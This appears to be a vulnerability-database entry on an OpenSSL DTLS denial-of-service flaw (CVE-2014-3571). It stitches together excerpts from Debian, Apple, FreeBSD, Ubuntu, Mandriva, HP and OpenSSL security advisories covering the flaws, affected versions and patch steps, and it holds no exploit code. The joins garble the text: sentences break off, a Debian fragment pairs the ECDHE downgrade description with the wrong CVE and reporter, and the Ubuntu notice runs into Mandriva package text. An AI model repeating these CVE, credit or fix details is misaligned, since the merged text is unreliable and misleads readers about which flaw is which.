var-201501-0435 OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c. OpenSSL is prone to denial-of-service vulnerability due to a NULL pointer dereference condition. An attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. References: CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 CVE-2015-0209 CVE-2015-0286 CVE-2015-0288 CVE-2015-5432 CVE-2015-5433 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The Common Vulnerabilities and Exposures project identifies the following issues: CVE-2014-3569 Frank Schmirler reported that the ssl23_get_client_hello function in OpenSSL does not properly handle attempts to use unsupported protocols. CVE-2014-3571 Markus Stenberg of Cisco Systems, Inc. This allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy. CVE-2014-8275 Antti Karjalainen and Tuomo Untinen of the Codenomicon CROSS project and Konrad Kraszewski of Google reported various certificate fingerprint issues, which allow remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism. For the upcoming stable distribution (jessie), these problems will be fixed soon. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004 OS X Yosemite 10.10.3 and Security Update 2015-004 are now available and address the following: Admin Framework Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A process may gain admin privileges without properly authenticating Description: An issue existed when checking XPC entitlements. This issue was addressed with improved entitlement checking. CVE-ID CVE-2015-1130 : Emil Kvarnhammar at TrueSec apache Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in Apache Description: Multiple vulnerabilities existed in Apache versions prior to 2.4.10 and 2.2.29, including one that may allow a remote attacker to execute arbitrary code. These issues were addressed by updating Apache to versions 2.4.10 and 2.2.29 CVE-ID CVE-2013-0118 CVE-2013-5704 CVE-2013-6438 CVE-2014-0098 CVE-2014-0117 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-3523 ATS Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: Multiple input validation issues existed in fontd. These issues were addressed through improved input validation. CVE-ID CVE-2015-1131 : Ian Beer of Google Project Zero CVE-2015-1132 : Ian Beer of Google Project Zero CVE-2015-1133 : Ian Beer of Google Project Zero CVE-2015-1134 : Ian Beer of Google Project Zero CVE-2015-1135 : Ian Beer of Google Project Zero Certificate Trust Policy Impact: Update to the certificate trust policy Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT202858. CFNetwork HTTPProtocol Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Cookies belonging to one origin may be sent to another origin Description: A cross-domain cookie issue existed in redirect handling. Cookies set in a redirect response could be passed on to a redirect target belonging to another origin. The issue was address through improved handling of redirects. CVE-ID CVE-2015-1089 : Niklas Keller CFNetwork Session Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Authentication credentials may be sent to a server on another origin Description: A cross-domain HTTP request headers issue existed in redirect handling. HTTP request headers sent in a redirect response could be passed on to another origin. The issue was addressed through improved handling of redirects. CVE-ID CVE-2015-1091 : Diego Torres (http://dtorres.me) CFURL Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An input validation issue existed within URL processing. This issue was addressed through improved URL validation. CVE-ID CVE-2015-1088 : Luigi Galli CoreAnimation Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A use-after-free issue existed in CoreAnimation. This issue was addressed through improved mutex management. CVE-ID CVE-2015-1136 : Apple FontParser Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-1093 : Marc Schoenefeld Graphics Driver Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A NULL pointer dereference existed in NVIDIA graphics driver's handling of certain IOService userclient types. This issue was addressed through additional context validation. CVE-ID CVE-2015-1137 : Frank Graziano and John Villamil of the Yahoo Pentest Team Hypervisor Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local application may be able to cause a denial of service Description: An input validation issue existed in the hypervisor framework. This issue was addressed through improved input validation. CVE-ID CVE-2015-1138 : Izik Eidus and Alex Fishman ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted .sgi file may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of .sgi files. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1139 : Apple IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A malicious HID device may be able to cause arbitrary code execution Description: A memory corruption issue existed in an IOHIDFamily API. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1095 : Andrew Church IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow issue existed in IOHIDFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1140 : lokihardt@ASRT working with HP's Zero Day Initiative, Luca Todesco IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to determine kernel memory layout Description: An issue existed in IOHIDFamily that led to the disclosure of kernel memory content. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1096 : Ilja van Sprundel of IOActive IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A heap buffer overflow existed in IOHIDFamily's handling of key-mapping properties. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4404 : Ian Beer of Google Project Zero IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A null pointer dereference existed in IOHIDFamily's handling of key-mapping properties. This issue was addressed through improved validation of IOHIDFamily key-mapping properties. CVE-ID CVE-2014-4405 : Ian Beer of Google Project Zero IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A user may be able to execute arbitrary code with system privileges Description: An out-of-bounds write issue exited in the IOHIDFamily driver. The issue was addressed through improved input validation. CVE-ID CVE-2014-4380 : cunzhang from Adlab of Venustech Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause unexpected system shutdown Description: An issue existed in the handling of virtual memory operations within the kernel. The issue is fixed through improved handling of the mach_vm_read operation. CVE-ID CVE-2015-1141 : Ole Andre Vadla Ravnas of www.frida.re Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause a system denial of service Description: A race condition existed in the kernel's setreuid system call. This issue was addressed through improved state management. CVE-ID CVE-2015-1099 : Mark Mentovai of Google Inc. Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local application may escalate privileges using a compromised service intended to run with reduced privileges Description: setreuid and setregid system calls failed to drop privileges permanently. This issue was addressed by correctly dropping privileges. CVE-ID CVE-2015-1117 : Mark Mentovai of Google Inc. Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: An attacker with a privileged network position may be able to redirect user traffic to arbitrary hosts Description: ICMP redirects were enabled by default on OS X. This issue was addressed by disabling ICMP redirects. CVE-ID CVE-2015-1103 : Zimperium Mobile Security Labs Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: An attacker with a privileged network position may be able to cause a denial of service Description: A state inconsistency existed in the processing of TCP headers. This issue was addressed through improved state handling. CVE-ID CVE-2015-1102 : Andrey Khudyakov and Maxim Zhuravlev of Kaspersky Lab Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: A out of bounds memory access issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1100 : Maxime Villard of m00nbsd Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may be able to bypass network filters Description: The system would treat some IPv6 packets from remote network interfaces as local packets. The issue was addressed by rejecting these packets. CVE-ID CVE-2015-1104 : Stephen Roettger of the Google Security Team Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1101 : lokihardt@ASRT working with HP's Zero Day Initiative Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may be able to cause a denial of service Description: A state inconsistency issue existed in the handling of TCP out of band data. This issue was addressed through improved state management. CVE-ID CVE-2015-1105 : Kenton Varda of Sandstorm.io LaunchServices Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause the Finder to crash Description: An input validation issue existed in LaunchServices's handling of application localization data. This issue was addressed through improved validation of localization data. CVE-ID CVE-2015-1142 LaunchServices Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A type confusion issue existed in LaunchServices's handling of localized strings. This issue was addressed through additional bounds checking. CVE-ID CVE-2015-1143 : Apple libnetcore Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted configuration profile may lead to unexpected application termination Description: A memory corruption issue existed in the handling of configuration profiles. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1118 : Zhaofeng Chen, Hui Xue, Yulong Zhang, and Tao Wei of FireEye, Inc. ntp Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may brute force ntpd authentication keys Description: The config_auth function in ntpd generated a weak key when an authentication key was not configured. This issue was addressed by improved key generation. CVE-ID CVE-2014-9298 OpenLDAP Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A remote unauthenticated client may be able to cause a denial of service Description: Multiple input validation issues existed in OpenLDAP. These issues were addressed by improved input validation. CVE-ID CVE-2015-1545 : Ryan Tandy CVE-2015-1546 : Ryan Tandy OpenSSL Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in OpenSSL Description: Multiple vulnerabilities existed in OpenSSL 0.9.8zc, including one that may allow an attacker to intercept connections to a server that supports export-grade ciphers. These issues were addressed by updating OpenSSL to version 0.9.8zd. CVE-ID CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204 Open Directory Client Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A password might be sent unencrypted over the network when using Open Directory from OS X Server Description: If an Open Directory client was bound to an OS X Server but did not install the certificates of the OS X Server, and then a user on that client changed their password, the password change request was sent over the network without encryption. This issue was addressed by having the client require encryption for this case. CVE-ID CVE-2015-1147 : Apple PHP Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in PHP Description: Multiple vulnerabilities existed in PHP versions prior to 5.3.29, 5.4.38, and 5.5.20, including one which may have led to arbitrary code execution. This update addresses the issues by updating PHP to versions 5.3.29, 5.4.38, and 5.5.20. CVE-ID CVE-2013-6712 CVE-2014-0207 CVE-2014-0237 CVE-2014-0238 CVE-2014-2497 CVE-2014-3478 CVE-2014-3479 CVE-2014-3480 CVE-2014-3487 CVE-2014-3538 CVE-2014-3587 CVE-2014-3597 CVE-2014-3668 CVE-2014-3669 CVE-2014-3670 CVE-2014-3710 CVE-2014-3981 CVE-2014-4049 CVE-2014-4670 CVE-2014-4698 CVE-2014-5120 QuickLook Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Opening a maliciously crafted iWork file may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of iWork files. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1098 : Christopher Hickstein SceneKit Available for: OS X Mountain Lion v10.8.5 Impact: Viewing a maliciously crafted Collada file may lead to arbitrary code execution Description: A heap buffer overflow existed in SceneKit's handling of Collada files. Viewing a maliciously crafted Collada file may have led to arbitrary code execution. This issue was addressed through improved validation of accessor elements. CVE-ID CVE-2014-8830 : Jose Duart of Google Security Team Screen Sharing Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A user's password may be logged to a local file Description: In some circumstances, Screen Sharing may log a user's password that is not readable by other users on the system. This issue was addressed by removing logging of credential. CVE-ID CVE-2015-1148 : Apple Security - Code Signing Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Tampered applications may not be prevented from launching Description: Applications containing specially crafted bundles may have been able to launch without a completely valid signature. This issue was addressed by adding additional checks. CVE-ID CVE-2015-1145 CVE-2015-1146 UniformTypeIdentifiers Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow existed in the way Uniform Type Identifiers were handled. This issue was addressed with improved bounds checking. CVE-ID CVE-2015-1144 : Apple WebKit Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in WebKit. This issues was addressed through improved memory handling. CVE-ID CVE-2015-1069 : lokihardt@ASRT working with HP's Zero Day Initiative Security Update 2015-004 (available for OS X Mountain Lion v10.8.5 and OS X Mavericks v10.9.5) also addresses an issue caused by the fix for CVE-2015-1067 in Security Update 2015-002. This issue prevented Remote Apple Events clients on any version from connecting to the Remote Apple Events server. In default configurations, Remote Apple Events is not enabled. OS X Yosemite 10.10.3 includes the security content of Safari 8.0.5. https://support.apple.com/en-us/HT204658 OS X Yosemite 10.10.3 and Security Update 2015-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJVJKj2AAoJEBcWfLTuOo7tDh4QAK0LxfwMRKcdOXOKpXsRz6lg lhZ+CLVcSepq8qBkFQ74f3B5CuhxD0IGQPaAuSXl51tWYdfN+92tkbmyZ9k8901l +I0vw6upeE+oqRnGtSRzq68UhcARbdV8V1+C0Xl3IIuuHc+xlEgvklDhF9Pc8XM6 DudGiVNqt6MOqd5Oc4s4FFF0nnpnyG9+UJem3mi4Ee88PwI4x1Hev7utPPmaPDzj cjkVeislko3QArNJxtBpkYudErA4eR5OX8Tdf12jAmPTtjrXUb3VigEf78Nna0RW kHTOGdB5EZ+YFZ8KlyIQlENBjTtI8CGdCF4/S/2xDN83NTRsimd5Y7LSjdd0uANo pqxAc3Gzn5xngWF1Qbb6V+XZBfz5NoeTq5BXBB5OHz4PSGaQuMsBA2RYFMzNLqWv D/T5U1JtzRLALt0lYAz63B0OhW7KXeLI9oer1Vo4wWF9O9cUFyuSI4JU5uYLQpJX kEpSFt4YPFFxMnlzCLzLkmVGax4w9M/tRHYeSKAnRlnsoPBtIGFItlNZE2RduD/R 5n2APoJa3banQ8miycGORYP3WsktDRZzBy+2QPWuz8sE3AvAkO9xWp8PrQBkqf/b 6CIG5UkCYITG2uzBXqnGbfDiEDvBLNN1Yq0ZZI23iYRxrdW0I0pv1CHio354q12G vVE37tYUU4PnLfwlcazq =MOsT -----END PGP SIGNATURE----- . Corrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE) 2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4) 2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16) 2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE) 2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8) 2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE) 2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22) CVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572 CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. Background FreeBSD includes software from the OpenSSL Project. II. [CVE-2014-3569] This does not affect FreeBSD's default build. [CVE-2014-3570] III. [CVE-2014-8275] IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 8.4 and FreeBSD 9.3] # fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch # fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc # gpg --verify openssl-9.3.patch.asc [FreeBSD 10.0] # fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch # fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc # gpg --verify openssl-10.0.patch.asc [FreeBSD 10.1] # fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch # fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc # gpg --verify openssl-10.1.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>. Restart all deamons using the library, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - ------------------------------------------------------------------------- stable/8/ r276865 releng/8.4/ r277195 stable/9/ r276865 releng/9.3/ r277195 stable/10/ r276864 releng/10.0/ r277195 releng/10.1/ r277195 - ------------------------------------------------------------------------- To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed: # svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NNNNNN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN> VII. ============================================================================ Ubuntu Security Notice USN-2459-1 January 12, 2015 openssl vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 14.10 - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS - Ubuntu 10.04 LTS Summary: Several security issues were fixed in OpenSSL. (CVE-2014-3571) Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain handshakes. (CVE-2014-3572) Antti Karjalainen, Tuomo Untinen and Konrad Kraszewski discovered that OpenSSL incorrectly handled certain certificate fingerprints. (CVE-2015-0204) Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled client authentication. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. This issue only affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-0206) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 14.10: libssl1.0.0 1.0.1f-1ubuntu9.1 Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.8 Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.21 Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.23 After a standard system update you need to reboot your computer to make all the necessary changes. The updated packages have been upgraded to the 1.0.0p version where these security flaws has been fixed. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570 https://www.openssl.org/news/secadv_20150108.txt _______________________________________________________________________ Updated Packages: Mandriva Business Server 1/X86_64: 08baba1b5ee61bdd0bfbcf81d465f154 mbs1/x86_64/lib64openssl1.0.0-1.0.0p-1.mbs1.x86_64.rpm 51198a2b577e182d10ad72d28b67288e mbs1/x86_64/lib64openssl-devel-1.0.0p-1.mbs1.x86_64.rpm aa34fd335001d83bc71810d6c0b14e85 mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0p-1.mbs1.x86_64.rpm c8b6fdaba18364b315e78761a5aa0c1c mbs1/x86_64/lib64openssl-static-devel-1.0.0p-1.mbs1.x86_64.rpm fc67f3da9fcd1077128845ce85be93e2 mbs1/x86_64/openssl-1.0.0p-1.mbs1.x86_64.rpm ab8f672de2bf2f0f412034f89624aa32 mbs1/SRPMS/openssl-1.0.0p-1.mbs1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04635715 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04635715 Version: 1 HPSBOV03318 rev.1 - HP SSL for OpenVMS, Remote Denial of Service (DoS) and other Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-04-13 Last Updated: 2015-04-13 Potential Security Impact: Remote Denial of Service (DoS) and other vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP SSL for OpenVMS. References: CVE-2014-8275 Cryptographic Issues (CWE-310) CVE-2014-3569 Remote Denial of Service (DoS) CVE-2014-3570 Cryptographic Issues (CWE-310) CVE-2014-3571 Remote Denial of Service (DoS) CVE-2014-3572 Cryptographic Issues (CWE-310) CVE-2015-0204 Cryptographic Issues (CWE-310) SSRT101934 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP SSL for OpenVMS: All versions prior to 1.4-502. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0204 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following software updates to resolve the vulnerabilities for HP SSL for OpenVMS. HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the following locations: - HP SSL for OpenVMS website: http://h71000.www7.hp.com/openvms/products/ssl/ssl.html - HP Support Center website: https://h20566.www2.hp.com/portal/site/hpsc/patch/home Note: Login using your HP Passport account. Search for the appropriate Patch Kit from the following table: HP SSL for OpenVMS Version Platform/OS Version Patch Kit Name 1.4-502 Alpha OpenVMS V8.3 and V8.4 HP-AXPVMS-SSL-V0104 1.4-502 ITANIUM OpenVMS V8.3, V8.3-1H1, and V8.4 HP-I64VMS-SSL-V0104 HISTORY Version:1 (rev.1) - 13 April 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. OpenSSL Security Advisory [08 Jan 2015] ======================================= DTLS segmentation fault in dtls1_get_record (CVE-2014-3571) =========================================================== Severity: Moderate A carefully crafted DTLS message can cause a segmentation fault in OpenSSL due to a NULL pointer dereference. This could lead to a Denial Of Service attack. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p. OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd. This issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of Cisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL core team. DTLS memory leak in dtls1_buffer_record (CVE-2015-0206) ======================================================= Severity: Moderate A memory leak can occur in the dtls1_buffer_record function under certain conditions. In particular this could occur if an attacker sent repeated DTLS records with the same sequence number but for the next epoch. The memory leak could be exploited by an attacker in a Denial of Service attack through memory exhaustion. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p. This issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also provided an initial patch. Further analysis was performed by Matt Caswell of the OpenSSL development team, who also developed the final patch. no-ssl3 configuration sets method to NULL (CVE-2014-3569) ========================================================= Severity: Low When openssl is built with the no-ssl3 option and a SSL v3 ClientHello is received the ssl method would be set to NULL which could later result in a NULL pointer dereference. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd. This issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The fix was developed by Kurt Roeckx. ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572) ========================================================== Severity: Low An OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite using an ECDSA certificate if the server key exchange message is omitted. This effectively removes forward secrecy from the ciphersuite. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd. This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team. RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204) ============================================================== Severity: Low An OpenSSL client will accept the use of an RSA temporary key in a non-export RSA key exchange ciphersuite. A server could present a weak temporary key and downgrade the security of the session. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd. This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team. DH client certificates accepted without verification [Server] (CVE-2015-0205) ============================================================================= Severity: Low An OpenSSL server will accept a DH certificate for client authentication without the certificate verify message. This effectively allows a client to authenticate without the use of a private key. This only affects servers which trust a client certificate authority which issues certificates containing DH keys: these are extremely rare and hardly ever encountered. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team. Certificate fingerprints can be modified (CVE-2014-8275) ======================================================== Severity: Low 